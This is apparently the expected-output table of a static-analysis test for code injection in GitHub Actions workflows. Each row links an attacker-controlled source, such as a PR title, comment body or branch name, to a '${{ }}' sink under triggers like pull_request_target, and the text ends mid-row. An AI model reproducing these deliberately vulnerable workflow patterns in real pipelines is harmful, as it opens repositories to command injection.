.github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | 